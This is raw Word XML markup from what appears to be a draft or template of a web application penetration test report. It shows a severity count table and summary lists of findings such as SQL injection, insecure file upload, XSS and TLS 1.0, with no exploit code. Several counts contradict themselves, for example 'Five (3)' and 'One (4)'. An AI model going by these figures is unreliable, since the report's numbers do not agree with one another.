          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61007A8B" w14:textId="5D166D9F" w:rsidR="00600E4C" w:rsidRPr="003E7FD2" w:rsidRDefault="00600E4C" w:rsidP="003E7FD2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79822F7E" wp14:editId="27E79F82">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130712671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92E9CC" w14:textId="77777777" w:rsidR="00600E4C" w:rsidRDefault="00600E4C" w:rsidP="00D9699E">
      <w:pPr>
        <w:jc w:val="cente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9699E" w14:paraId="2C945C41" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:left w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:bottom w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:right w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32E2967A" w14:textId="77777777" w:rsidR="00D9699E" w:rsidRDefault="00D9699E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39B39153" w14:textId="77777777" w:rsidR="00D9699E" w:rsidRDefault="00D9699E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1C232"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38DAF02C" w14:textId="77777777" w:rsidR="00D9699E" w:rsidRDefault="00D9699E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="38761D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="423CABB7" w14:textId="77777777" w:rsidR="00D9699E" w:rsidRDefault="00D9699E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9699E" w14:paraId="148F3A30" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="52A3FC1C" w14:textId="7CD351F8" w:rsidR="00D9699E" w:rsidRDefault="009B3744">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="780B977C" w14:textId="7CA047BE" w:rsidR="00D9699E" w:rsidRDefault="009B3744">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6FBF5DAA" w14:textId="7EA4BC34" w:rsidR="00D9699E" w:rsidRDefault="00D60A74">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1B793912" w14:textId="0AE3D700" w:rsidR="00D9699E" w:rsidRDefault="00D60A74">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55B80453" w14:textId="77777777" w:rsidR="00D9699E" w:rsidRDefault="00D9699E" w:rsidP="00D9699E"/>
    <w:p w14:paraId="4876F632" w14:textId="63B1206D" w:rsidR="00612424" w:rsidRPr="00BB4590" w:rsidRDefault="008C7F98" w:rsidP="00BB4590">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00D9699E" w:rsidRPr="008C7F98">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ighest</w:t>
      </w:r>
      <w:r w:rsidR="00D9699E" w:rsidRPr="008C7F98">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D9699E" w:rsidRPr="1F04327A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">severity </w:t>
      </w:r>
      <w:r w:rsidR="00C7759C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">identified </w:t>
      </w:r>
      <w:r w:rsidR="00D9699E" w:rsidRPr="1F04327A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerabilities give potential attackers the opportunity to </w:t>
      </w:r>
      <w:r w:rsidR="00C7759C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006C254E" w:rsidRPr="008C7F98">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">get </w:t>
      </w:r>
      <w:r w:rsidR="00C7759C" w:rsidRPr="008C7F98">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>full [internal access to the Data Cente</w:t>
      </w:r>
      <w:r w:rsidRPr="008C7F98">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00C7759C" w:rsidRPr="008C7F98">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/Web Server / Internal Files/ Internal Codes /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C7759C" w:rsidRPr="008C7F98">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>DB ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D9699E" w:rsidRPr="1F04327A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D9699E" w:rsidRPr="1F04327A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D9699E" w:rsidRPr="1F04327A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensure data confidentiality, integrity, and availability, security remediations should be implemented as described in the security assessment findings. </w:t>
      </w:r>
      <w:r w:rsidR="00612424">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00612424" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Performed tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CFAEE3" w14:textId="77777777" w:rsidR="00612424" w:rsidRPr="00A63FB9" w:rsidRDefault="00612424" w:rsidP="00612424">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63FB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>● All set of applicable OWASP Top 10 Security Threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F889778" w14:textId="0B877E0B" w:rsidR="005F1D35" w:rsidRPr="008C7F98" w:rsidRDefault="00612424" w:rsidP="008C7F98">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63FB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>● All set of applicable SANS 25 Security Threats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228DFBBD" w14:textId="5ED620F5" w:rsidR="006B546A" w:rsidRPr="00BB4590" w:rsidRDefault="00201D1D" w:rsidP="00201D1D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C62C67" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application </w:t>
      </w:r>
      <w:r w:rsidR="00F2682E" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability </w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E323659" w14:textId="55F68D32" w:rsidR="00BB4590" w:rsidRPr="00BB4590" w:rsidRDefault="00BB4590" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2D43C9F5">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Two (2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="2D43C9F5">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Insecure File Upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF5342" w14:textId="22543660" w:rsidR="006B546A" w:rsidRPr="00BB4590" w:rsidRDefault="00B27368" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2483D384">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Five </w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BB4590" w:rsidRPr="2483D384">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) application vulnerable to Structured Query Language (SQL) injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D29DD66" w14:textId="27B2F42C" w:rsidR="006B546A" w:rsidRPr="00BB4590" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FFCC00"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FFCC00"/>
        </w:rPr>
        <w:t>Two (2) applications vulnerable to reflected Cross-site Scripting (XSS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F6466" w14:textId="49F29176" w:rsidR="006B546A" w:rsidRPr="00BB4590" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FFCC00"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FFCC00"/>
        </w:rPr>
        <w:t>One (</w:t>
      </w:r>
      <w:r w:rsidR="00722DFA" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FFCC00"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FFCC00"/>
        </w:rPr>
        <w:t>) application using an insecure</w:t>
      </w:r>
      <w:r w:rsidR="00BB4590" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FFCC00"/>
        </w:rPr>
        <w:t xml:space="preserve"> Word press Plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FFCC00"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B8ECD" w14:textId="646A00E9" w:rsidR="006B546A" w:rsidRPr="00BB4590" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>One (</w:t>
      </w:r>
      <w:r w:rsidR="00656A67" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>) application using an outdated JavaScript library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3081F79C" w14:textId="2E695C96" w:rsidR="006B546A" w:rsidRPr="00BB4590" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>One (</w:t>
      </w:r>
      <w:r w:rsidR="00656A67" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>) application found to have directory listing enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9DD49A" w14:textId="552878DC" w:rsidR="006B546A" w:rsidRPr="00BB4590" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>Two (2) applications using Transport Layer Security (TLS) version 1.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F1BD8F" w14:textId="76652ACF" w:rsidR="006B546A" w:rsidRPr="00BB4590" w:rsidRDefault="005B11DC" w:rsidP="006B546A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006B546A" w:rsidRPr="00BB4590">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web Application Penetration Testing (PT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501F7D6" w14:textId="159F5FA6" w:rsidR="006B546A" w:rsidRPr="00BB4590" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4590">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>User information extracted from the application’s backend database using SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078D7AE7" w14:textId="02EED428" w:rsidR="006B546A" w:rsidRPr="00FD5071" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5071">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>Files accessed via directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B4B5BD" w14:textId="052B4687" w:rsidR="005318E8" w:rsidRPr="004978D4" w:rsidRDefault="006B546A" w:rsidP="00BF2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5071">
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Pop-up alerts executed with XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D1C2C" w14:textId="0E6FB665" w:rsidR="002552EC" w:rsidRPr="005318E8" w:rsidRDefault="00326D4D" w:rsidP="005318E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc178498956"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00780D02">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Goals </w:t>
      </w:r>
      <w:r w:rsidR="003E7FD2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Objectives &amp;</w:t>
      </w:r>
      <w:r w:rsidR="00780D02">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Scenario</w:t>
      </w:r>
      <w:r w:rsidR="00CA5537">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [If needed]</w:t>
      </w:r>
      <w:r w:rsidR="00780D02" w:rsidRPr="00386D05">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="-42"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1885"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="5665"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E075C5" w14:paraId="76A75E87" w14:textId="77777777" w:rsidTr="00957FF4">
        <w:trPr>
